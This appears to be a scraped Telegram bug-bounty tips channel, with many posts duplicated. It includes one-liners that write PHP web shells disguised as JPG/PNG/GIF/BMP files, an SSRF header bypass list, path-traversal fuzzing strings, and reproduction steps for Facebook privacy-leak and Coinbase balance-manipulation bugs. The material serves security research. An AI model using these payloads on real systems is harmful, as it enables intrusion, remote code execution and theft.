Includes all the important wordlists used while bug hunting
https://github.com/YaS5in3/Bug-Bounty-Wordlists
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
https://github.com/YaS5in3/Bug-Bounty-Wordlists
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
❤5🔥1
https://chat.openai.com ✅
1/ Just had a 🤯 thought:
ChatGPT is like a money-launderer for information.
2/ ChatGPT is a super cool AI language model that can generate human-like text for tons of use-cases! It's trained on tons of public information.
3/ Money laundering, on the other hand, is the process of disguising the proceeds of illegal activities as legitimate funds. It's often done by mixing the illegal funds with legitimate transactions.
4/ Both ChatGPT and money laundering create deniability. With ChatGPT, it's hard to tell where an idea came from because it can generate text that's similar to what other people have written.
5/ And with money laundering, it's hard to trace the origin of funds because they are mixed with legitimate transactions.
6/ Crazy stuff. Fin.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
1/ Just had a 🤯 thought:
ChatGPT is like a money-launderer for information.
2/ ChatGPT is a super cool AI language model that can generate human-like text for tons of use-cases! It's trained on tons of public information.
3/ Money laundering, on the other hand, is the process of disguising the proceeds of illegal activities as legitimate funds. It's often done by mixing the illegal funds with legitimate transactions.
4/ Both ChatGPT and money laundering create deniability. With ChatGPT, it's hard to tell where an idea came from because it can generate text that's similar to what other people have written.
5/ And with money laundering, it's hard to trace the origin of funds because they are mixed with legitimate transactions.
6/ Crazy stuff. Fin.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2💯1
Easy P1 🫥
1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
3: Now check manually sensitive keyword js file
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
3: Now check manually sensitive keyword js file
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍2
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload.
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
Also:
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
Also:
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
❤6👍1
You can follow these steps:
• It is also important to test the website carefully and systematically, as some XSS vulnerabilities may be well-hidden and difficult to find.
• If you are unsure about how to proceed, you may want to seek help from an experienced security professional.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤4
Bug : Facebook Group Members Disclosure
Organization : Facebook or Meta
Bounty : $4500
Read Full Bug Reports👇
Intro : A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation.
How ? : Doc_ID: 4997502340291357. By changing the actorID with the victim’s actorID and groupID
Continue👇
with the group we want to test and in the response if it shows “WeakEntityReference” than he/she is not the member of the group.
However, if it shows “StrongEntityReference” than he/she is the member of the group.
Continue👇
Step 1.
From a non-member’s account send this request by replacing the actorID variable to that of the victim and groupID variable to that of the group which you want to test against.
Step 2.
If you get “StrongEntityReference” in response. He/She is the member of the group. However, If you get “WeakEntityReference” in the response He/She is not the member of the group. Using this you can find out if someone is a member of the private group or not.
POC of above👆bug:
https://drive.google.com/file/d/1XAitPW8Evnoh11N8yQqkAxKkyX3zpFSK/view
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Organization : Facebook or Meta
Bounty : $4500
Read Full Bug Reports👇
Intro : A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation.
How ? : Doc_ID: 4997502340291357. By changing the actorID with the victim’s actorID and groupID
Continue👇
with the group we want to test and in the response if it shows “WeakEntityReference” than he/she is not the member of the group.
However, if it shows “StrongEntityReference” than he/she is the member of the group.
Continue👇
Step 1.
From a non-member’s account send this request by replacing the actorID variable to that of the victim and groupID variable to that of the group which you want to test against.
Step 2.
If you get “StrongEntityReference” in response. He/She is the member of the group. However, If you get “WeakEntityReference” in the response He/She is not the member of the group. Using this you can find out if someone is a member of the private group or not.
POC of above👆bug:
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
👍4❤1
Bug Bounty Hint
It's possible to cause application-level DOS when the password field on the login/registration page doesn't have length limits.
The greater the length - the more power is required to hash a password.
However, not all hash functions are vulnerable to this attack
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
It's possible to cause application-level DOS when the password field on the login/registration page doesn't have length limits.
The greater the length - the more power is required to hash a password.
However, not all hash functions are vulnerable to this attack
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
👍5❤1
Best SSRF Bypass List 🔥
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Find hidden params in javascript files
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g');done; echo -e "\e[1;33m$url\n\e[1;32m$vars"
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g');done; echo -e "\e[1;33m$url\n\e[1;32m$vars"
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
❤6👍2
Bug Bounty Report ✅
• Bug : Ethereum account balance manipulation
• Bug Type : Business Logic Errors
• Organization : Coinbase
• Bounty : $10000
• Technology : Blockchain or Web 3
Read This Report : 👇
📌 Summary :
➡️ By using a smart contract to distribute ether over a set of wallets you can manipulate the account balance of your Coinbase account.
➡️ If 1 of the internal transactions in the smart contract fails all transactions before that will be reversed.
➡️ But on Coinbase these transactions wasn't not reversed, meaning someone could add as much ether to their balance as they want.
When looking Coinbase wallet address after this transaction you will see that it is empty, but checking your Coinbase wallet will show your funds.
📌 Steps To Reproduce:
• Setup a smart contract with a few valid Coinbase wallets and 1 final faulty wallet
(always throw exception when receiving funds smart contract for example)
• Transfer appropriate funds to smart contract.
• Execute smart contract adding the set amount of ether to the Coinbase wallets without ever actually leaving the smart contract wallet because the complete transaction fails at the last wallet.
• Repeat until you have more than enough Ethereum in your Coinbase wallet.
• Cash out, transfer to off site wallet
How It Could Be Fix :
➡️ The issue was fixed by changing the contract handling logic.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
• Bug : Ethereum account balance manipulation
• Bug Type : Business Logic Errors
• Organization : Coinbase
• Bounty : $10000
• Technology : Blockchain or Web 3
Read This Report : 👇
📌 Summary :
➡️ By using a smart contract to distribute ether over a set of wallets you can manipulate the account balance of your Coinbase account.
➡️ If 1 of the internal transactions in the smart contract fails all transactions before that will be reversed.
➡️ But on Coinbase these transactions wasn't not reversed, meaning someone could add as much ether to their balance as they want.
When looking Coinbase wallet address after this transaction you will see that it is empty, but checking your Coinbase wallet will show your funds.
📌 Steps To Reproduce:
• Setup a smart contract with a few valid Coinbase wallets and 1 final faulty wallet
(always throw exception when receiving funds smart contract for example)
• Transfer appropriate funds to smart contract.
• Execute smart contract adding the set amount of ether to the Coinbase wallets without ever actually leaving the smart contract wallet because the complete transaction fails at the last wallet.
• Repeat until you have more than enough Ethereum in your Coinbase wallet.
• Cash out, transfer to off site wallet
How It Could Be Fix :
➡️ The issue was fixed by changing the contract handling logic.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
How to Find XSS Like a Pro 🫥
To find XSS (Cross-Site Scripting) bugs, you can use combination of manual testing and automated tools.
Some steps you can follow to find XSS:
➡️ identify potential entry points for XSS attacks, such as input fields in web forms, query parameters in URLs, or file uploads.
➡️ Use a web application scanner to test these entry points for XSS vulnerabilities.
These scanners can automatically scan your web application and identify potential vulnerabilities, including XSS.
➡️ Manually review your website's code for any places where user-supplied input is not properly sanitized or validated.
For example, look for places where the website includes user input in the page without properly encoding it first.
➡️ Test the website by trying to inject various types of malicious input, such as JavaScript code, into different parts of the website.
For example, try entering JavaScript code into forms, URL parameters, and other inputs to see if the website is vulnerable to XSS attacks.
➡️ If you find any potential XSS vulnerabilities, verify them by attempting to exploit them.
This will help you confirm that the issue is real and that it needs to be fixed
Once you have identified and verified any XSS vulnerabilities, work with your development team to fix the issues and prevent them from happening again in the future.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
To find XSS (Cross-Site Scripting) bugs, you can use combination of manual testing and automated tools.
Some steps you can follow to find XSS:
➡️ identify potential entry points for XSS attacks, such as input fields in web forms, query parameters in URLs, or file uploads.
➡️ Use a web application scanner to test these entry points for XSS vulnerabilities.
These scanners can automatically scan your web application and identify potential vulnerabilities, including XSS.
➡️ Manually review your website's code for any places where user-supplied input is not properly sanitized or validated.
For example, look for places where the website includes user input in the page without properly encoding it first.
➡️ Test the website by trying to inject various types of malicious input, such as JavaScript code, into different parts of the website.
For example, try entering JavaScript code into forms, URL parameters, and other inputs to see if the website is vulnerable to XSS attacks.
➡️ If you find any potential XSS vulnerabilities, verify them by attempting to exploit them.
This will help you confirm that the issue is real and that it needs to be fixed
Once you have identified and verified any XSS vulnerabilities, work with your development team to fix the issues and prevent them from happening again in the future.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1
Android Security materials and resources For Pentesters and Bug Hunters
https://github.com/saeidshirazi/awesome-android-security?s=09
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
https://github.com/saeidshirazi/awesome-android-security?s=09
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
⚡3❤🔥2🔥1
A collection of awesome tools used by Web hackers :)
https://github.com/hahwul/WebHackersWeapons
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
https://github.com/hahwul/WebHackersWeapons
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
🔥5👍2
Secondary context fuzzing:
/..%2f
/..;/
/../
/..%00/
/..%0d/
/..%5c
/..\
/..%ff/
/%2e%2e%2f
/.%2e/
/%3f (?)
/%26 (&)
/%23 (#)
via https://samcurry.net/hacking-starbucks/
100 million😲 sbux accounts disclosure
see also: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
/..%2f
/..;/
/../
/..%00/
/..%0d/
/..%5c
/..\
/..%ff/
/%2e%2e%2f
/.%2e/
/%3f (?)
/%26 (&)
/%23 (#)
via https://samcurry.net/hacking-starbucks/
100 million😲 sbux accounts disclosure
see also: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
🔥3
Bug Bounty Hint
How to turn Self-XSS into Reflected/Stored XSS
• Cache poisoning
• Copy+Paste trick using IFrame
• Cookie poisoning using auto login
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
How to turn Self-XSS into Reflected/Stored XSS
• Cache poisoning
• Copy+Paste trick using IFrame
• Cookie poisoning using auto login
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
⚡3👍2❤🔥1
Bug Bounty Hint
Soon you will be able to use regular expression searches in GitHub repositories (in addition to basic dorking). You can join the waitlist @ cs.github.com
Meanwhile, you can use grep.app
👉 www.github.com/l4yton/RegHex
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Soon you will be able to use regular expression searches in GitHub repositories (in addition to basic dorking). You can join the waitlist @ cs.github.com
Meanwhile, you can use grep.app
👉 www.github.com/l4yton/RegHex
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
GitHub
GitHub - l4yton/RegHex: A collection of regexes for every possbile use
A collection of regexes for every possbile use. Contribute to l4yton/RegHex development by creating an account on GitHub.
🔥4👍1
How to get Started into Bug Bounty ?
⚙ Basics:
1. Networking basics
2. Linux basics
3. Computer flow
4. Learning 1 at 1
⚙ How things works?
1. Website
2. Apps
3. Servers
4. Networks
5. Technologies
⚙ What Tools?
1. Proxy Tools
2. Tools installation
3. Virtual Box
4. Browser Usage
5. Linux Commands
⚙ Labs
1. Portswigger
2. Hacker101
3. CTFs
4. HackThisSite
5. Pentesterlab
⚙ Platforms
1. Bugcrowd
2. HackerOne
3. Intigriti
4. YesWeHack and more
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
⚙ Basics:
1. Networking basics
2. Linux basics
3. Computer flow
4. Learning 1 at 1
⚙ How things works?
1. Website
2. Apps
3. Servers
4. Networks
5. Technologies
⚙ What Tools?
1. Proxy Tools
2. Tools installation
3. Virtual Box
4. Browser Usage
5. Linux Commands
⚙ Labs
1. Portswigger
2. Hacker101
3. CTFs
4. HackThisSite
5. Pentesterlab
⚙ Platforms
1. Bugcrowd
2. HackerOne
3. Intigriti
4. YesWeHack and more
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
👍5
Tips for finding hardcoded credentials
Whenever you are searching for hardcoded credentails, don't forget to read "jquery.js" files as well. Sometime you might find 3rd party hardcoded credentials
#bugbountytips #hacking #infosec
Whenever you are searching for hardcoded credentails, don't forget to read "jquery.js" files as well. Sometime you might find 3rd party hardcoded credentials
#bugbountytips #hacking #infosec
👍3
CSP-bypass techniques ☘️
https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
#bugbounty #bugbountytips
https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
#bugbounty #bugbountytips
❤🔥2